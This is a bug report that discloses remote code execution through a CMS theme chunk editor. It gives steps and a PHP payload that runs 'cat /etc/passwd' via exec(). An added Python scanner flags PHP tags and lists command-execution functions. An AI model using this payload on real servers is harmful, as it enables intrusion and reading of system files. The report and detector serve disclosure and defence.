Remote Code Execution via Theme module
th3lawbreaker opened this issue · 1 comments
th3lawbreaker commented
Describe the bug
An attacker could insert any executable code through PHP via the Theme module to execute commands on the server.
To Reproduce
- Log into the panel.
- Go to "/admin/index.php?id=themes&action=edit_chunk"
- Click edit
- Insert payload
```php
<?php exec('cat /etc/passwd 2>&1', $output); ?>
<?php print_r($output); ?>
```
- Go to index view
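A defensive check for the behaviour reported above, as an added example that is not part of the original issue or the project's code: it scans theme chunk content for PHP open tags and code-execution calls, so it can run before a chunk is saved or as an audit over stored chunks. The function name, the list of flagged calls and the sample chunks are assumptions constructed for illustration.

```python
import re

# PHP open tags that make a chunk executable when the theme is rendered.
# "<?xml" is excluded so XML declarations in feed templates are not flagged.
PHP_OPEN = re.compile(r"<\?(?:php\b|=|(?!xml\b))", re.IGNORECASE)
# Calls that run OS commands or evaluate code (assumed, non-exhaustive list).
RISKY_CALL = re.compile(
    r"\b(exec|system|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)

def audit_chunk(text):
    """Return (line_no, reason) findings for one chunk's content.

    Heuristic: a "?>" inside a PHP string literal ends the block early,
    so treat any php-open-tag finding as enough to reject the chunk.
    """
    findings = []
    in_php = False  # PHP blocks may span several lines
    for no, line in enumerate(text.splitlines(), 1):
        pos = 0
        while pos < len(line):
            if not in_php:
                m = PHP_OPEN.search(line, pos)
                if not m:
                    break
                findings.append((no, "php-open-tag"))
                in_php, pos = True, m.end()
            else:
                end = line.find("?>", pos)
                segment = line[pos:] if end == -1 else line[pos:end]
                for call in RISKY_CALL.finditer(segment):
                    findings.append((no, "call:" + call.group(1).lower()))
                if end == -1:
                    break
                in_php, pos = False, end + 2
    return findings

# Constructed sample chunks: the content from the report plus two benign ones.
SAMPLE_CHUNKS = {
    "reported": "<?php exec('cat /etc/passwd 2>&1', $output); ?>\n"
                "<?php print_r($output); ?>",
    "footer": '<div class="footer">&copy; Site</div>',
    "feed": '<?xml version="1.0" encoding="UTF-8"?>\n<rss></rss>',
}

if __name__ == "__main__":
    for name, body in SAMPLE_CHUNKS.items():
        print(name, audit_chunk(body))
```

Pattern matching like this is a tripwire for review and alerting; it does not replace rendering chunks without evaluating them as PHP.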